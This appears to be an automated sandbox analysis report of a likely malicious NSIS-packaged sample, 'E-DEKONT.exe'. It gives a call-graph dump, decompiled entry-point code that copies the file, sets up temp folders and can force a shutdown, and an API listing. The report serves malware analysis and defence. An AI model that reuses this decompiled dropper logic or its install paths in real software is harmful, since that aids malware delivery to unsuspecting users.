402d2a 8699->8702 8701->8692 8703 4060ef RegOpenKeyExW 8702->8703 8704 402d58 8703->8704 8705 402dd0 8704->8705 8707 402d5c 8704->8707 8705->8701 8706 402d7e RegEnumKeyW 8706->8707 8708 402d95 RegCloseKey 8706->8708 8707->8706 8707->8708 8709 402db6 RegCloseKey 8707->8709 8711 402d2a 6 API calls 8707->8711 8710 40665c 5 API calls 8708->8710 8709->8705 8712 402da5 8710->8712 8711->8707 8713 402dc4 RegDeleteKeyW 8712->8713 8714 402da9 8712->8714 8713->8705 8714->8705 9947 2b6927c 9948 2b6927f 9947->9948 9949 2b86193 K32EnumDeviceDrivers 9948->9949 9950 2b6352f 9949->9950 9951 401491 9952 4052e6 24 API calls 9951->9952 9953 401498 9952->9953 10192 402592 10193 4025c1 10192->10193 10194 4025a6 10192->10194 10196 4025f5 10193->10196 10197 4025c6 10193->10197 10195 402c15 17 API calls 10194->10195 10204 4025ad 10195->10204 10199 402c37 17 API calls 10196->10199 10198 402c37 17 API calls 10197->10198 10200 4025cd WideCharToMultiByte lstrlenA 10198->10200 10201 4025fc lstrlenW 10199->10201 10200->10204 10201->10204 10202 40263f 10203 402629 10203->10202 10205 405e26 WriteFile 10203->10205 10204->10202 10204->10203 10206 405e55 5 API calls 10204->10206 10205->10202 10206->10203 9954 402a9a SendMessageW 9955 402ab4 InvalidateRect 9954->9955 9956 402abf 9954->9956 9955->9956 9957 40149e 9958 4022f1 9957->9958 9959 4014ac PostQuitMessage 9957->9959 9959->9958 9960 40469f 9961 4046d5 9960->9961 9962 4046af 9960->9962 9964 40427e 8 API calls 9961->9964 9963 404217 18 API calls 9962->9963 9966 4046bc SetDlgItemTextW 9963->9966 9965 4046e1 9964->9965 9966->9961 9967 100010e1 9968 10001111 9967->9968 9969 100011d8 GlobalFree 9968->9969 9970 100012ba 2 API calls 9968->9970 9971 100011d3 9968->9971 9972 10001272 2 API calls 9968->9972 9973 10001164 GlobalAlloc 9968->9973 9974 100011f8 GlobalFree 9968->9974 9975 100011c4 GlobalFree 9968->9975 9976 100012e1 lstrcpyW 9968->9976 9970->9968 9971->9969 9972->9975 9973->9968 9974->9968 9975->9968 9976->9968 8966 4015a3 8967 402c37 17 API calls 8966->8967 8968 4015aa SetFileAttributesW 8967->8968 8969 4015bc 8968->8969 9977 4028a7 9978 402c37 17 API calls 9977->9978 9979 4028b5 9978->9979 9980 4028cb 9979->9980 9981 402c37 17 API calls 9979->9981 9982 405d4f 2 API calls 9980->9982 9981->9980 9983 4028d1 9982->9983 10005 405d74 GetFileAttributesW CreateFileW 9983->10005 9985 4028de 9986 402981 9985->9986 9987 4028ea GlobalAlloc 9985->9987 9990 402989 DeleteFileW 9986->9990 9991 40299c 9986->9991 9988 402903 9987->9988 9989 402978 CloseHandle 9987->9989 10006 40332b SetFilePointer 9988->10006 9989->9986 9990->9991 9993 402909 9994 403315 ReadFile 9993->9994 9995 402912 GlobalAlloc 9994->9995 9996 402922 9995->9996 9997 402956 9995->9997 9998 4030fa 31 API calls 9996->9998 9999 405e26 WriteFile 9997->9999 10004 40292f 9998->10004 10000 402962 GlobalFree 9999->10000 10001 4030fa 31 API calls 10000->10001 10003 402975 10001->10003 10002 40294d GlobalFree 10002->9997 10003->9989 10004->10002 10005->9985 10006->9993 10207 401db3 GetDC 10208 402c15 17 API calls 10207->10208 10209 401dc5 GetDeviceCaps MulDiv ReleaseDC 10208->10209 10210 402c15 17 API calls 10209->10210 10211 401df6 10210->10211 10212 4062a4 17 API calls 10211->10212 10213 401e33 CreateFontIndirectW 10212->10213 10214 40258c 10213->10214 10215 4043b4 10216 4043cc 10215->10216 10220 4044e6 10215->10220 10221 404217 18 API calls 10216->10221 10217 404550 10218 40461a 10217->10218 10219 40455a GetDlgItem 10217->10219 10224 40427e 8 API calls 10218->10224 10225 404574 10219->10225 10226 4045db 10219->10226 10220->10217 10220->10218 10222 404521 GetDlgItem SendMessageW 10220->10222 10223 404433 10221->10223 10248 404239 EnableWindow 10222->10248 10229 404217 18 API calls 10223->10229 10230 404615 10224->10230 10225->10226 10231 40459a SendMessageW LoadCursorW SetCursor 10225->10231 10226->10218 10227 4045ed 10226->10227 10232 404603 10227->10232 10233 4045f3 SendMessageW 10227->10233 10235 404440 CheckDlgButton 10229->10235 10249 404663 10231->10249 10232->10230 10237 404609 SendMessageW 10232->10237 10233->10232 10234 40454b 10238 40463f SendMessageW 10234->10238 10246 404239 EnableWindow 10235->10246 10237->10230 10238->10217 10241 40445e GetDlgItem 10247 40424c SendMessageW 10241->10247 10243 404474 SendMessageW 10244 404491 GetSysColor 10243->10244 10245 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 10243->10245 10244->10245 10245->10230 10246->10241 10247->10243 10248->10234 10252 4058aa ShellExecuteExW 10249->10252 10251 4045c9 LoadCursorW SetCursor 10251->10226 10252->10251 10253 2b69142 10254 2b691aa 10253->10254 10255 2b86193 K32EnumDeviceDrivers 10254->10255 10256 2b6352f 10254->10256 10255->10256 10012 4014b8 10013 4014be 10012->10013 10014 401389 2 API calls 10013->10014 10015 4014c6 10014->10015

                                                                            Executed Functions

                                                                            Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 4 4033c8-4033dc call 4065ec lstrlenA 2->4 9 4033de-4033fa call 40665c * 3 4->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 30 4034a5-4034a9 28->30 31 40349e-4034a3 28->31 38 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->38 39 403619-403633 DeleteFileW call 402ec1 29->39 33 4034b0-4034b4 30->33 34 4034ab-4034af 30->34 31->30 31->31 36 403573-403580 call 405b80 33->36 37 4034ba-4034c0 33->37 34->33 54 403582-403583 36->54 55 403584-40358a 36->55 43 4034c2-4034ca 37->43 44 4034db-403514 37->44 38->39 52 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 38->52 56 4036e4-4036f4 call 4038b6 OleUninitialize 39->56 57 403639-40363f 39->57 48 4034d1 43->48 49 4034cc-4034cf 43->49 50 403531-40356b 44->50 51 403516-40351b 44->51 48->44 49->44 49->48 50->36 53 40356d-403571 50->53 51->50 58 40351d-403525 51->58 52->39 52->56 53->36 60 403592-4035a0 call 406282 53->60 54->55 55->28 61 403590 55->61 73 40381a-403820 56->73 74 4036fa-40370a call 4058e4 ExitProcess 56->74 62 4036d4-4036db call 403990 57->62 63 403645-403650 call 405b80 57->63 65 403527-40352a 58->65 66 40352c 58->66 68 4035a5 60->68 61->68 76 4036e0 62->76 80 403652-403687 63->80 81 40369e-4036a8 63->81 65->50 65->66 66->50 68->29 78 403822-403838 GetCurrentProcess OpenProcessToken 73->78 79 40389e-4038a6 73->79 76->56 87 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40386e-40387c call 40665c 78->88 82 4038a8 79->82 83 4038ac-4038b0 ExitProcess 79->83 89 403689-40368d 80->89 85 403710-403724 call 40584f lstrcatW 81->85 86 4036aa-4036b8 call 405c5b 81->86 82->83 100 403731-40374b lstrcatW lstrcmpiW 85->100 101 403726-40372c lstrcatW 85->101 86->56 99 4036ba-4036d0 call 406282 * 2 86->99 87->88 102 40388a-403895 ExitWindowsEx 88->102 103 40387e-403888 88->103 93 403696-40369a 89->93 94 40368f-403694 89->94 93->89 95 40369c 93->95 94->93 94->95 95->81 99->62 100->56 105 40374d-403750 100->105 101->100 102->79 106 403897-403899 call 40140b 102->106 103->102 103->106 108 403752-403757 call 4057b5 105->108 109 403759 call 405832 105->109 106->79 117 40375e-40376c SetCurrentDirectoryW 108->117 109->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->56 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                                            C-Code - Quality: 81%
                                                                            			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x434eec = _t51;
				if(_t51 != 6) {
					_t149 = E0040665C(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x434fb8 = _t56;
				SHGetFileInfoW(0x42b208, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E00406282(0x433ee0, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe\"";
				E00406282(_t193, _t60);
				 *0x434ee0 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe\"" == 0x22) {
					_t63 =  &M0043F002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B80(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E00403342(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E004038B6();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x434f94 - _t151;
								if( *0x434f94 == _t151) {
									L72:
									_t72 =  *0x434fac;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E0040665C(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058E4( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x434f00 == _t151) {
							L47:
							 *0x434fac =  *0x434fac | 0xffffffff;
							 *(_t197 + 0x14) = E00403990( *0x434fac);
							goto L48;
						}
						_t184 = E00405B80(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040584F(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E00405832();
									} else {
										E004057B5();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra" - _t151; // 0x43
									if(_t243 == 0) {
										E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t195);
									}
									E00406282(0x435000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x435800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x120)));
										DeleteFileW(0x42aa08);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe", 0x42aa08, 1) != 0) {
											E00406048(_t156, 0x42aa08, _t151);
											E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x124)));
											_t103 = E00405867(0x42aa08);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x435800 =  *0x435800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406048(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C5B(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t185);
							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E00403342(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E00403342(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x434fa0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B80(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065EC(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E0040665C(0xa);
					 *0x434ee4 = E0040665C(8);
					_t56 = E0040665C(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x434eef =  *0x434eef | 0x00000040;
						}
					}
					goto L8;
				}
			}








































                                                                            0x0040337e
                                                                            0x0040337f
                                                                            0x00403386
                                                                            0x0040338a
                                                                            0x00403392
                                                                            0x00403396
                                                                            0x004033a2
                                                                            0x004033ab
                                                                            0x004033b0
                                                                            0x004033b3
                                                                            0x004033ba
                                                                            0x004033c1
                                                                            0x004033c1
                                                                            0x004033ba
                                                                            0x004033c3
                                                                            0x004033c3
                                                                            0x0040340b
                                                                            0x0040340c
                                                                            0x00403413
                                                                            0x00403419
                                                                            0x0040342f
                                                                            0x0040343f
                                                                            0x00403444
                                                                            0x0040344a
                                                                            0x00403451
                                                                            0x00403465
                                                                            0x0040346a
                                                                            0x0040346c
                                                                            0x00403470
                                                                            0x00403475
                                                                            0x00403475
                                                                            0x00403484
                                                                            0x00403486
                                                                            0x0040348a
                                                                            0x00403490
                                                                            0x004035a7
                                                                            0x004035ad
                                                                            0x004035b8
                                                                            0x004035ba
                                                                            0x004035bf
                                                                            0x004035c1
                                                                            0x00403619
                                                                            0x0040361e
                                                                            0x00403628
                                                                            0x0040362f
                                                                            0x00403633
                                                                            0x004036e4
                                                                            0x004036e4
                                                                            0x004036e9
                                                                            0x004036ef
                                                                            0x004036f4
                                                                            0x0040381a
                                                                            0x00403820
                                                                            0x0040389e
                                                                            0x0040389e
                                                                            0x004038a3
                                                                            0x004038a6
                                                                            0x004038a8
                                                                            0x004038a8
                                                                            0x004038b0
                                                                            0x004038b0
                                                                            0x00403830
                                                                            0x00403836
                                                                            0x00403838
                                                                            0x00403845
                                                                            0x00403858
                                                                            0x00403860
                                                                            0x00403868
                                                                            0x00403868
                                                                            0x00403870
                                                                            0x00403875
                                                                            0x0040387c
                                                                            0x0040388a
                                                                            0x0040388d
                                                                            0x00403893
                                                                            0x00403895
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040387e
                                                                            0x00403884
                                                                            0x00403886
                                                                            0x00403888
                                                                            0x00403897
                                                                            0x00403899
                                                                            0x00000000
                                                                            0x00403899
                                                                            0x00000000
                                                                            0x00403888
                                                                            0x0040387c
                                                                            0x00403703
                                                                            0x0040370a
                                                                            0x0040370a
                                                                            0x0040363f
                                                                            0x004036d4
                                                                            0x004036d4
                                                                            0x004036e0
                                                                            0x00000000
                                                                            0x004036e0
                                                                            0x0040364c
                                                                            0x00403650
                                                                            0x0040369e
                                                                            0x0040369e
                                                                            0x004036a0
                                                                            0x004036a8
                                                                            0x0040371b
                                                                            0x0040371d
                                                                            0x00403724
                                                                            0x0040372c
                                                                            0x0040372c
                                                                            0x00403737
                                                                            0x0040373c
                                                                            0x0040374b
                                                                            0x0040374f
                                                                            0x00403750
                                                                            0x00403759
                                                                            0x00403752
                                                                            0x00403752
                                                                            0x00403752
                                                                            0x0040375f
                                                                            0x00403765
                                                                            0x0040376c
                                                                            0x00403774
                                                                            0x00403774
                                                                            0x00403782
                                                                            0x0040378e
                                                                            0x0040379c
                                                                            0x004037a1
                                                                            0x004037a7
                                                                            0x004037b3
                                                                            0x004037b9
                                                                            0x004037c3
                                                                            0x004037d9
                                                                            0x004037ea
                                                                            0x004037f0
                                                                            0x004037f7
                                                                            0x004037fa
                                                                            0x00403800
                                                                            0x00403800
                                                                            0x004037f7
                                                                            0x00403804
                                                                            0x0040380b
                                                                            0x0040380b
                                                                            0x00403810
                                                                            0x00403810
                                                                            0x00000000
                                                                            0x0040374b
                                                                            0x004036aa
                                                                            0x004036ad
                                                                            0x004036b8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036c0
                                                                            0x004036cb
                                                                            0x004036d0
                                                                            0x00000000
                                                                            0x004036d0
                                                                            0x00403659
                                                                            0x00403671
                                                                            0x00403682
                                                                            0x00403683
                                                                            0x00403687
                                                                            0x00403689
                                                                            0x00403697
                                                                            0x0040369a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040369a
                                                                            0x0040369c
                                                                            0x00000000
                                                                            0x0040369c
                                                                            0x004035c9
                                                                            0x004035d5
                                                                            0x004035da
                                                                            0x004035df
                                                                            0x004035e1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004035e9
                                                                            0x004035f1
                                                                            0x00403602
                                                                            0x0040360a
                                                                            0x0040360c
                                                                            0x00403611
                                                                            0x00403613
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403496
                                                                            0x00403496
                                                                            0x00403498
                                                                            0x0040349c
                                                                            0x004034a5
                                                                            0x004034a9
                                                                            0x004034ae
                                                                            0x004034af
                                                                            0x004034af
                                                                            0x004034b4
                                                                            0x00000000
                                                                            0x004034ba
                                                                            0x004034bb
                                                                            0x004034c0
                                                                            0x004034c2
                                                                            0x004034ca
                                                                            0x004034d1
                                                                            0x004034d1
                                                                            0x004034ca
                                                                            0x004034e2
                                                                            0x004034f5
                                                                            0x004034f6
                                                                            0x0040350b
                                                                            0x00403510
                                                                            0x00403514
                                                                            0x0040351d
                                                                            0x00403525
                                                                            0x0040352c
                                                                            0x0040352c
                                                                            0x00403525
                                                                            0x00403538
                                                                            0x0040354b
                                                                            0x0040354c
                                                                            0x00403561
                                                                            0x00403567
                                                                            0x0040356b
                                                                            0x00000000
                                                                            0x00403592
                                                                            0x00403592
                                                                            0x00403597
                                                                            0x004035a0
                                                                            0x004035a5
                                                                            0x004035a5
                                                                            0x00000000
                                                                            0x004035a5
                                                                            0x0040356b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040349e
                                                                            0x0040349e
                                                                            0x0040349f
                                                                            0x004034a0
                                                                            0x00000000
                                                                            0x00403573
                                                                            0x0040357a
                                                                            0x00403580
                                                                            0x00403583
                                                                            0x00403583
                                                                            0x00403584
                                                                            0x00403587
                                                                            0x00000000
                                                                            0x00403590
                                                                            0x004033c8
                                                                            0x004033c9
                                                                            0x004033d5
                                                                            0x004033dc
                                                                            0x00000000
                                                                            0x004033de
                                                                            0x004033e0
                                                                            0x004033ee
                                                                            0x004033f3
                                                                            0x004033fa
                                                                            0x004033fe
                                                                            0x00403402
                                                                            0x00403404
                                                                            0x00403404
                                                                            0x00403402
                                                                            0x00000000
                                                                            0x004033fa

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403396
                                                                            • GetVersion.KERNEL32 ref: 0040339C
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                            • OleInitialize.OLE32(00000000), ref: 00403413
                                                                            • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                            • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\E-DEKONT.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\E-DEKONT.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                              • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                              • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                            • ExitProcess.KERNEL32 ref: 0040370A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\E-DEKONT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                            • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\E-DEKONT.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                                            • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                            • ExitProcess.KERNEL32 ref: 004038B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
